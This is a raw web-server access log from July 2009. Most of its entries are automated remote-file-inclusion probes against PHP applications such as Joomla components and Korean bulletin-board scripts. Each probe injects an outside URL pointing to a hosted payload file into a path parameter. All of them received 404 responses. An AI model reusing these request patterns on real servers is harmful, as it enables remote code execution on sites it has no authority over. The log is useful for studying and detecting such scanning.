222.236.47.192 - - [18/Jul/2009:02:22:05 -0400] "GET /embed/day.php?path=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:22:05 -0400] "GET /logs/embed/day.php?path=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:22:05 -0400] "GET /logs/access_log.Q109051900%20%20/embed/day.php?path=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:22:41 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:22:54 -0400] "GET /logs/access_log.Q109070500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:22:59 -0400] "GET /logs/access_log.Q109061500%20%20/embed/day.php?path=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:23:25 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:23:25 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:23:25 -0400] "GET /logs/access_log.Q109051600%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:23:45 -0400] "GET /logs/access_log.Q109070500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
141.223.5.11 - - [18/Jul/2009:02:24:12 -0400] "GET /logs/error_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:02:24:13 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:02:24:14 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
218.237.66.229 - - [18/Jul/2009:02:24:21 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:02:24:21 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:02:24:21 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:02:24:18 -0400] "GET /images/ACE_BoneScrewFlyer.pdf HTTP/1.0" 200 1221193 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
141.223.5.11 - - [18/Jul/2009:02:24:30 -0400] "GET /logs/error_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:02:24:30 -0400] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:02:24:31 -0400] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
118.129.166.129 - - [18/Jul/2009:02:24:41 -0400] "GET //newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:24:42 -0400] "GET /logs//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:24:42 -0400] "GET /logs/access_log.Q109051800//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:24:53 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:24:53 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:24:53 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:24:54 -0400] "GET /logs/access_log.Q109053100//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:24:58 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:02:24:57 -0400] "GET /logs/access_log.Q109051700 HTTP/1.0" 200 2276726 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.192 - - [18/Jul/2009:02:25:55 -0400] "GET /logs/access_log.Q109051900%20%20/embed/day.php?path=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:25:55 -0400] "GET /embed/day.php?path=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:25:55 -0400] "GET /logs/embed/day.php?path=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:25:55 -0400] "GET /logs/access_log.Q109061500%20%20/embed/day.php?path=http://www.animax.co.kr/a/ghost/uid.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:02:26:01 -0400] "GET /logs/access_log.Q109061100/convert/mvcw.php?vwar_root=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:02:26:07 -0400] "GET /logs/access_log.Q109062100/convert/mvcw.php?vwar_root=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:02:26:26 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
204.30.3.225 - - [18/Jul/2009:02:26:26 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
204.30.3.225 - - [18/Jul/2009:02:26:26 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
210.205.6.233 - - [18/Jul/2009:02:26:28 -0400] "GET /logs/access_log.Q109070300%20%20//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
204.30.3.225 - - [18/Jul/2009:02:26:43 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.aboutav.com//Scripts/id.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
209.59.12.99 - - [18/Jul/2009:02:26:57 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.205.6.233 - - [18/Jul/2009:02:27:09 -0400] "GET /logs/access_log.Q109070500%20%20//////?mosConfig_absolute_path=http://www.otr.co.kr/bbs/files/1.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:27:10 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:27:10 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:27:10 -0400] "GET /logs/access_log.Q109051100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:27:56 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.237.66.229 - - [18/Jul/2009:02:28:08 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:02:28:23 -0400] "GET //mambots/content/multithumb/errors.php?error=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:02:28:23 -0400] "GET /logs//mambots/content/multithumb/errors.php?error=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:02:28:23 -0400] "GET /logs/access_log.Q109062800//mambots/content/multithumb/errors.php?error=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:02:28:27 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/errors.php?error=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
141.223.5.11 - - [18/Jul/2009:02:29:29 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/ramaid.txt???? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
141.223.5.11 - - [18/Jul/2009:02:29:41 -0400] "GET /logs/access_log.Q109050700//admin/classes/TplLoad.php?full_path_to_public_program=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
72.30.161.230 - - [18/Jul/2009:02:30:33 -0400] "GET /logs/access_log.Q109051400 HTTP/1.0" 200 6017281 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [18/Jul/2009:02:31:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [18/Jul/2009:02:32:01 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:32:01 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:32:01 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:32:17 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:32:38 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
65.23.158.226 - - [18/Jul/2009:02:32:50 -0400] "GET /logs/access_log.Q109060400//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 290 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:02:32:50 -0400] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:02:32:50 -0400] "GET /logs/access_log.Q109052100//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 290 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.23.158.226 - - [18/Jul/2009:02:32:50 -0400] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://internetpanel.dk/wp/tmp/thumb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
206.225.23.4 - - [18/Jul/2009:02:33:00 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:33:00 -0400] "GET /logs/access_log.Q109062400%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:33:00 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:33:04 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:33:04 -0400] "GET /logs/access_log.Q109061100%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:33:04 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:02:33:16 -0400] "GET /logs/access_log.Q109070500%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:02:33:25 -0400] "GET /logs/access_log.Q109062800%20%20//mambots/content/multithumb/errors.php?error=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.163.252.93 - - [18/Jul/2009:02:33:45 -0400] "GET /logs/access_log.Q109051100%20%20//mambots/content/multithumb/errors.php?error=http://palle.altervista.org/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:34:06 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:34:06 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:34:21 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:34:21 -0400] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:34:40 -0400] "GET /logs/access_log.Q109051800%20%20//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
118.129.166.129 - - [18/Jul/2009:02:34:44 -0400] "GET /logs/access_log.Q109053100%20%20//newspublish/include.php?path[docroot]=http://www.angelcitytrading.com/css/1.zot?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:35:00 -0400] "GET /logs/access_log.Q109062700%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:02:35:12 -0400] "GET /logs/error_log.Q109062100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.86.9.234 - - [18/Jul/2009:02:35:31 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:02:35:31 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:02:35:31 -0400] "GET /appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:02:35:31 -0400] "GET /logs/appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 219 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:02:35:31 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:02:35:31 -0400] "GET /appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:02:35:47 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
70.86.9.234 - - [18/Jul/2009:02:35:50 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://www.namak.go.kr//bbs//skin/ggambo7002_board/id1.txt?%0D?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
69.10.63.163 - - [18/Jul/2009:02:35:55 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:35:55 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:35:55 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:35:59 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:36:11 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [18/Jul/2009:02:36:21 -0400] "GET /logs/access_log.Q109070500//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:36:35 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:36:56 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:36:56 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.10.63.163 - - [18/Jul/2009:02:36:56 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:02:36:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.225.23.4 - - [18/Jul/2009:02:37:04 -0400] "GET /logs/access_log.Q109062400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:37:07 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
58.227.193.198 - - [18/Jul/2009:02:37:07 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://netseoul.com/gboard/rs/copyright.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:37:29 -0400] "GET /logs/access_log.Q109051900/embed/day.php?path=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.236.47.192 - - [18/Jul/2009:02:37:30 -0400] "GET /logs/access_log.Q109061500/embed/day.php?path=http://yatchiko.com/X/templates/links.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:37:59 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:37:59 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:37:59 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:38:08 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:02:38:09 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://lpkpm.com/lib/fatal1.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:38:11 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:38:11 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:38:11 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
92.50.143.90 - - [18/Jul/2009:02:38:18 -0400] "GET /logs/error_log.Q109052300//errors.php?error=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
92.50.143.90 - - [18/Jul/2009:02:38:18 -0400] "GET //errors.php?error=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
92.50.143.90 - - [18/Jul/2009:02:38:18 -0400] "GET /logs//errors.php?error=http://www.amembersignup.com/signup/data/id.txt?%0D?? HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
216.117.172.131 - - [18/Jul/2009:02:38:25 -0400] "GET /logs/error_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:38:35 -0400] "GET /logs/error_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:39:18 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
216.117.172.131 - - [18/Jul/2009:02:39:38 -0400] "GET /logs/access_log.Q109070800//bbs//skin/ggambo7002_board/write.php?dir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:02:39:55 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:02:39:55 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
125.243.207.199 - - [18/Jul/2009:02:40:00 -0400] "GET //include/footer.php?_path[counter]=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:02:40:01 -0400] "GET /embed/day.php?path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:02:40:01 -0400] "GET /logs/embed/day.php?path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
210.205.57.2 - - [18/Jul/2009:02:40:01 -0400] "GET /logs/access_log.Q109051900/embed/day.php?path=http://www.babycome.ne.jp/report///id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
